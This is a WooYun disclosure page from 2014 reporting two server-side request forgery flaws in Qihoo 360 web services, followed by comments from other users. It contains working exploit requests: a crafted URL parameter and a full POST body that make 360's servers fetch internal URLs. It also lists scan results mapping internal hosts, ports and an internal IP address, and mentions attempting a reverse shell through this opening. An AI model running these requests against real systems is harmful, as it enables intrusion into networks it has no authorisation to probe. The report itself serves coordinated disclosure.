当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083592

漏洞标题:利用两个鸡肋SSRF探测360内网

相关厂商:奇虎360

漏洞作者: lijiejie

提交时间:2014-11-17 15:46

修复时间:2015-01-01 15:48

公开时间:2015-01-01 15:48

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-17: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

简要描述:

利用两个鸡肋SSRF探测360内网

详细说明:

两个SSRF都比较鸡肋,但仍值得一试。
第一个SSRF位于:

http://te.tuan.360.cn/checkapi_ajax.html?apiurl=http://soft.corp.qihoo.net


只能返回HTTP Status。可以探测指定的端口是否开放web服务(如80,8360,8080,8000),以及相应的资源是否存在。
第二个SSRF位于diy主题:

POST /diy/sl/themes/getpreview HTTP/1.1
Content-Length: 862
Content-Type: application/x-www-form-urlencoded
Cookie: sc=52cfa2a2123cceed13f31e75.THEME.1
Host: meihua.360.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
data=%7b%22banner%22:%7b%22url%22:%22http://img1.mobile.360.cn/c0/cdn/baibian/themeResource/image/banner/2655e631-ed27-4d1e-9e14-76a91c50b528.png%22%7d%2c%22default_lock_wallpaper%22:%7b%22url%22:%22http:%5c/%5c/220.181.156.221:8360/favicon.ico%22%7d%2c%22incharge%22:%7b%22color%22:%22FFFFFF%22%2c%22size%22:18%7d%2c%22status_bar%22:%7b%22url%22:%22http://p2.qhimg.com/t01e34730d2f2f6a5be.png%22%7d%2c%22txt_clock%22:%7b%22color%22:%22FFFFFF%22%2c%22size%22:64%7d%2c%22txt_date%22:%7b%22color%22:%22FFFFFF%22%2c%22size%22:20%7d%2c%22unlock_button%22:%7b%22url%22:%22http://img1.mobile.360.cn/c0/cdn/baibian/themeResource/image/unlock_button/837bad4f-ed18-41fd-b2f3-4faa1b5fa9fd.png%22%7d%2c%22unlock_button_selected%22:%7b%22url%22:%22http://img1.mobile.360.cn/c0/cdn/baibian/themeResource/image/unlock_button_selected/c2ea4be6-c76f-4cfb-9573-a5c3e7617742.png%22%7d%7d


default_lock_wallpaper.url等多个参数均可以构造。可以把我们指定URL的图片合成到一张新图片上。

漏洞证明:

对于第一处,简单示例获取C段对应开放8360的主机。得到:

http://220.181.156.34:8360	返回200
http://220.181.156.35:8360	返回200
http://220.181.156.41:8360	返回200
(中间全省略)
http://220.181.156.64:8360	返回200
http://220.181.156.100:8360	返回200
http://220.181.156.102:8360	返回200
(中间全省略)
http://220.181.156.106:8360	返回200
http://220.181.156.221:8360	返回200
http://220.181.156.227:8360	返回200
http://220.181.156.241:8360	返回200
http://220.181.156.244:8360	返回200
	
http://220.181.156.8:8360	返回404
http://220.181.156.18:8360	返回500
http://220.181.156.36:8360	返回404
http://220.181.156.37:8360	返回404
http://220.181.156.38:8360	返回404
http://220.181.156.40:8360	返回404
http://220.181.156.65:8360	返回403
http://220.181.156.107:8360	返回302
http://220.181.156.108:8360	返回500
http://220.181.156.109:8360	返回302
http://220.181.156.119:8360	返回403
http://220.181.156.120:8360	返回403
http://220.181.156.122:8360	返回403
http://220.181.156.159:8360	返回401
http://220.181.156.173:8360	返回403
http://220.181.156.124:8360	返回403
http://220.181.156.176:8360	返回401
http://220.181.156.210:8360	返回403
http://220.181.156.219:8360	返回403
http://220.181.156.228:8360	返回401
http://220.181.156.242:8360	返回302
http://220.181.156.243:8360	返回401
http://220.181.156.247:8360	返回401
http://220.181.156.248:8360	返回302
http://220.181.156.249:8360	返回302
http://220.181.156.252:8360	返回401


比如,我们可以探测那些外网无法访问的资源。
地址http://soft.corp.qihoo.net,ping之后得到10.108.79.189。正常情况外网肯定无法访问。但是漏洞1可以探测到目标主机的,并且返回的是200,如图:

360_soft.corp.png


提示XML格式不正确,说明已经下载成功。
扫一个C段,继续探测内网开放80端口的主机,得到10.108.79.189段大量80提供web服务的主机:

360_10.108.79_HTTP_80.png


8360端口的web服务也很多,不再截图。
利用这个漏洞可以盲打内网,限制极大,例如尝试利用structs命令执行漏洞反弹shell output回来。
下面继续说第二个漏洞。它的作用更鸡肋,帮我们把Server能访问到的web图片合成出来,搬到外网来。尝试合成内网几个favicon.ico的时候遇到点问题,似乎并未成功。
节约时间,就找了几个外网无法访问的资源来合成。仅说明问题存在:

220.181.156.102:8360/favicon.ico
220.181.156.103:8360/favicon.ico
220.181.156.104:8360/favicon.ico
220.181.156.105:8360/favicon.ico
220.181.156.106:8360/favicon.ico
http://img1.mobile.360.cn/c0/baibian/themes/images/origin/preview_resources_1416203408887_1416203408887.jpg
220.181.156.107:8360/favicon.ico
220.181.156.109:8360/favicon.ico
220.181.156.221:8360/favicon.ico
http://img1.mobile.360.cn/c0/baibian/themes/images/origin/preview_resources_1416203645372_1416203645372.jpg
220.181.156.210:8360/favicon.ico
http://img1.mobile.360.cn/c0/baibian/themes/images/origin/preview_resources_1416203759520_1416203759520.jpg


如图,可以看到220.181.156.102:8360/favicon.ico的模样:

360_favicon.png


修复方案:

过滤,限制

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-11-17 16:18

厂商回复:

感谢您的反馈,正在通知相关业务进行修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-11-17 16:00 | 低调的瘦子 ( 普通白帽子 | Rank:466 漏洞数:68 | loading……………………)

    前排~

  2. 2014-11-17 16:01 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)

    好吊,想送你一辣条。

  3. 2014-11-17 16:09 | 龍 、 ( 普通白帽子 | Rank:398 漏洞数:135 | 你若安好 我就是晴天)

    好吊

  4. 2014-11-17 16:10 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

    好厉害,我只是社工进去了下798旁边的大楼

  5. 2014-11-17 16:11 | debbbbie ( 路人 | Rank:10 漏洞数:2 | 深藏功与名 - A Rubyist)

    吊!

  6. 2014-11-17 16:14 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    前排

  7. 2014-11-17 16:17 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    好吊,想送你一辣条。

  8. 2014-11-17 16:25 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    直接进东哥办公室,然后上网渗透。

  9. 2014-11-17 17:01 | greg.wu ( 普通白帽子 | Rank:815 漏洞数:99 | 打酱油的~)

    洞主上班好闲啊,整天刷rank,涨的飞快,牛逼

  10. 2014-11-17 18:14 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    牛老大,武哥想你了……